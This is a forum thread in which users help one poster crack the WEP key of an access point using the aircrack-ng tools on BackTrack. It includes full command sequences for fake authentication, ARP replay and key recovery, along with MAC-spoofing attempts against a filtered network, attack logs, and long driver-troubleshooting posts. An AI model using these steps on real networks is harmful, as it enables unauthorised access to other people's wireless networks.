1

Topic: Discussion WLAN Hacking Ubuntu

Discussion Hacking WiFi Ubuntu WEP Crack. No registration needed - but.. registered users are automatically subscribed to the topic :) Edit: Registration required because of spam. Sorry.

2

Re: Discussion WLAN Hacking Ubuntu

Hi. It works with aireplay-ng attack 4 or 5 (KoreK's chopchop, fragmentation). Association is needed only for attacks 2 and 3. A hidden ESSID can be uncovered with tools like MDK or SKA. I think USB devices are backward compatible. USB 2 works with USB 1 with no problem.

3

Re: Discussion WLAN Hacking Ubuntu

Thanks for your answer, arestes, but I can't try the aireplay-ng 4 or 5 attack because my MB K7N2 Delta-L ILSR is damaged (it supports USB 1.1 if I change it in BIOS setup) that made my rt73 work on my long USB cable (11 meters from my roof) with Backtrack. For example, the MB P4M800pro (in Windows) can be set to USB 1.1 if I disable the USB enhanced host controller, but I don't know how to configure USB 2.0 to USB 1.1 in Backtrack. Is there any solution so I can run airodump-ng + aireplay-ng + aircrack-ng with USB 1.1 on Backtrack?

4

Re: Discussion WLAN Hacking Ubuntu

It's recommended to turn off the enhanced USB controller for packet injection with some versions of the serialmonkey driver.

5

Re: Discussion WLAN Hacking Ubuntu

Oh yeah, arestes.. Do tools like MDK or SKA work on Windows XP too? Can you mention where I can download tools to uncover a hidden ESSID and get a connection to a hidden ESSID on Windows XP with a Ralink rt73.. Thanks for your help

6

Re: Discussion WLAN Hacking Ubuntu

Windows is an operating system for painting pictures and playing games :)

7

Re: Discussion WLAN Hacking Ubuntu

Thanks for the comments, but now I am desperate to try with attack aireplay-ng 4 or 5 (KoreK's chopchop, fragmentation) and attacks 2 and 3. It doesn't respond and is rejected by the access point. I think DARKIPUNK03 does not allow all client MACs to connect, but I'm not sure? Can you help and tell me any other commands, one by one, to crack this AP with no client allowed to connect? If I use Kismet to get information on the DARKIPUNK03 AP, it is always constrained by "Suspicious client (probing networks but never participating)". I used Backtrack 3 and am not an expert. Thanks for the help. Screenshot
http://airdump.net/files/howtocrack.png

8

Re: Discussion WLAN Hacking Ubuntu

Hi Darkipunk. One more detail.. are you injecting with the right driver? After removing the USB wireless device

modprobe rt73

Insert the device, activate the interface and start monitor mode

ifconfig rausb0 up
iwconfig rausb0 mode monitor or iwpriv rausb0 rfmontx 1

To detect and display signal strength (with the serialmonkey driver loaded)

iwpriv rausb0 forceprism 1

Do you..?

9

Re: Discussion WLAN Hacking Ubuntu

Yes n3tQ. I think I have activated monitor mode, so I can start airodump-ng and kismet.

ifconfig rausb0 up
airmon-ng start rausb0
=========================================
Before, the WEP key of DARKIPUNK03 could be found with a simple crack:

airodump-ng --channel 6 --write output --ivs rausb0
aireplay-ng --fakeauth 30 -e DARKIPUNK03 -a 00:02:6F:XX:XX:XX -h 00:C0:A8:XX:XX:XX rausb0
aireplay-ng --arpreplay -b 00:02:6F:XX:XX:XX -h 00:C0:A8:XX:XX:XX -x 512 rausb0
aircrack-ng -b 00:02:6F:XX:XX:XX output-01.ivs
screenshot

I think that WEP key could be found because I got the MAC of the station/clients (00:C0:A8:XX:XX:XX), but now the WEP key of the DARKIPUNK03 AP has changed, it has a MAC filter and has hidden MAC stations/clients, but the BSSID is still probing. I am still confused about how to crack the DARKIPUNK03 AP???
=======================================
I have tried to fake all MACs in the air near the AP; it always gets rejected, error:
03:43:45 Sending Authentication Request (Open System)
03:43:45 AP rejects the source MAC address (XX:XX:XX:XX:XX:XX) ?
Authentication failed (code 1)

03:54:17 Sending Authentication Request (Open System)
03:54:17 Authentication failed (code 14)

Saving chosen packet in replay_src-0402-044330.cap
04:49:44 Data packet found!
04:49:44 Sending fragmented packet
04:49:46 No answer, repeating...
04:49:46 Trying a LLC NULL packet
04:49:46 Sending fragmented packet
04:49:59 No answer, repeating...
04:50:01 Sending fragmented packet
04:50:01 Got a deauthentication packet!
04:50:06 No answer, repeating...
04:50:06 Still nothing, trying another packet...
========================================
What is forceprism 1 used for? Is my forceprism activated? How do I activate forceprism?

========================================
I loaded the default driver from the Backtrack 3 LiveCD; its rt73 is from serialmonkey too. I don't know how to install from http://rt2x00.serialmonkey.com/rt73-cvs-daily.tar.gz . I have extracted it to /root and tried
$ cd ./rt73-cvs-YYYYMMDDHH/Module
$ make
and it is always unsuccessful and gives an error. How do I install the rt73-cvs-daily driver?

10

Re: Discussion WLAN Hacking Ubuntu

Where is the answer to my question.. did you modprobe rt73 ???

11

Re: Discussion WLAN Hacking Ubuntu

I don't know how to check whether the response of modprobe rt73 is OK, can you tell me? I have tried: (sorry for the text, because I don't know how to order it)

bt ~ # lsusb
Bus 4 Device 2: ID 13b1:0020 Linksys WUSB54GC 802.11g Adapter [ralink rt73]
Bus 4 Device 1: ID 0000:0000
Bus 2 Device 1: ID 0000:0000
Bus 1 Device 2: ID 062a:0000 Creative Labs
Bus 1 Device 1: ID 0000:0000
Bus 3 Device 1: ID 0000:0000

bt ~ # modprobe rt73
bt ~ # ifconfig rausb0 up
bt ~ # iwconfig rausb0 mode monitor
bt ~ # iwpriv rausb0 rfmontx 1

bt ~ # iwpriv rausb0 forceprism 1
bt ~ # iwpriv rausb0

rausb0 Available private ioctls :
set (8BE2) : set 1024 char & get 0
bbp (8BE3) : set 1024 char & get 1024 char
mac (8BE5) : set 1024 char & get 1024 char
adhocOfdm (8BE6) : set 1 int & get 0
stat (8BE9) : set 1024 char & get 1024 char
get_site_survey (8BED) : set 1024 char & get 1024 char
get_RaAP_Cfg (8BEF) : set 1024 char & get 0
forceprism (8BF0) : set 1024 char & get 0
rfmontx (8BEC) : set 1024 char & get 1 char
auth (8BE7) : set 1 int & get 0
enc (8BE8) : set 1 int & get 0
wpapsk (8BEA) : set 64 char & get 0
psm (8BEB) : set 1 int & get 0

bt ~ # modinfo rt73
filename: /lib/modules/2.6.21.5/extra/rt73.ko
license: GPL
description: Ralink RT73 802.11abg WLAN Driver k2wrlz modifications 2.0.0
author: http://rt2x00.serialmonkey.com
alias: usb:v13B1p0023d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DF6p90ACd*dc*dsc*dp*ic*isc*ip*
alias: usb:v1690p0722d*dc*dsc*dp*ic*isc*ip*
alias: usb:v06F8pE010d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DF6p9712d*dc*dsc*dp*ic*isc*ip*
alias: usb:v18E8p6196d*dc*dsc*dp*ic*isc*ip*
alias: usb:v13B1p0020d*dc*dsc*dp*ic*isc*ip*
alias: usb:v050Dp705Ad*dc*dsc*dp*ic*isc*ip*
alias: usb:v050Dp7050d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07D1p3C04d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07D1p3C03d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1044p800Ad*dc*dsc*dp*ic*isc*ip*
alias: usb:v1631pC019d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1371p9032d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1371p9022d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1472p0009d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0769p31F3d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07B8pB21Dd*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DB0pA861d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DB0pA874d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DB0p6877d*dc*dsc*dp*ic*isc*ip*
alias: usb:v14B2p3C22d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1044p8008d*dc*dsc*dp*ic*isc*ip*
alias: usb:v18E8p6229d*dc*dsc*dp*ic*isc*ip*
alias: usb:v18E8p6196d*dc*dsc*dp*ic*isc*ip*
alias: usb:v148Fp2671d*dc*dsc*dp*ic*isc*ip*
alias: usb:v148Fp2573d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0B05p1723d*dc*dsc*dp*ic*isc*ip*
depends:
vermagic: 2.6.21.5 SMP mod_unload 486
parm: debug:Enable debug, accepted values: 0 (no debug, default), 1 (Trace), 2 (Info). (int)

I get a problem when I want to install the rt73 driver from serialmonkey. I tried like this:

bt ~ # cd rt73-cvs-2008040114

bt rt73-cvs-2008040114 # cd Module/

bt Module # make
make: *** /lib/modules/2.6.21.5/build: No such file or directory. Stop.
rt73.ko failed to build!
make: *** [module] Error 1

bt Module # makefile
-bash: makefile: command not found

bt Module # dir
CVS/ connect.c oid.h rtmp.h rtmp_type.h sync.c
Makefile iwpriv_usage.txt rt2x00debug.c rtmp_def.h rtmp_wep.c wpa.c
TESTING md5.c rt2x00debug.h rtmp_info.c rtusb_bulk.c wpa.h
assoc.c md5.h rt73.bin rtmp_init.c rtusb_data.c
auth.c mlme.c rt73.h rtmp_main.c rtusb_io.c
auth_rsp.c mlme.h rt_config.h rtmp_tkip.c sanity.c

Please help me..

12

Re: Discussion WLAN Hacking Ubuntu

Hi man, this is a never-ending story.. I think it'll be better (and quicker) if you come into our IRC channel to powwow about modprobe rt73.

13

Re: Discussion WLAN Hacking Ubuntu

But does this require that the passphrase be a dictionary phrase, or a combo of words found in the dictionary?

14

Re: Discussion WLAN Hacking Ubuntu

Thanks for helping me in the IRC channel, but now I can't find the airdump.net channel. I "got a deauth/disassoc packet. Is the source MAC associated?". Can I resolve this distractor? Is it the deauth from the Suspicious client?

15

Re: Discussion WLAN Hacking Ubuntu

darkipunk, I think I can't understand your question.

16

Re: Discussion WLAN Hacking Ubuntu

Sorry about my English, n3tQ :) Is there any app for finding valid authenticated clients on an AP? Because I always get a deauth/disassoc packet when I run any attack mode with the fake client MACs shown in kismet (because I can't see the clients of the AP in airodump-ng). If I have caught 1 ARP I always get a deauth/disassoc; can I resolve it?
Some of the attacks say:

Saving chosen packet in replay_src-0418-113957.cap
11:40:02 Data packet found!
11:40:02 Sending fragmented packet
11:40:02 Got a deauthentication packet!
---
07:19:34 AP rejects the source MAC address (00:02:6F:XX:XX:XX) ?
Authentication failed (code 1)
---
11:33:31.416337 Retry 213us BSSID:00:02:6f:XX:XX:XX DA:00:02:6f:XX:XX:XX SA:00:02:6f:XX:XX:XX DeAuthentication: Class 2 frame received from nonauthenticated station

n3tQ, why is it that when I run airoscript 6, 7, 8, 9, 10 it always fails and does not show a response from aireplay-ng?

6) Chopchop attack
7) Chopchop attack using a client
8) Solo interactive attack (attempt to jump start stalled injections)
9) Chopchop attack injection part of the attack
10) Chopchop attack using a client injection part of the attack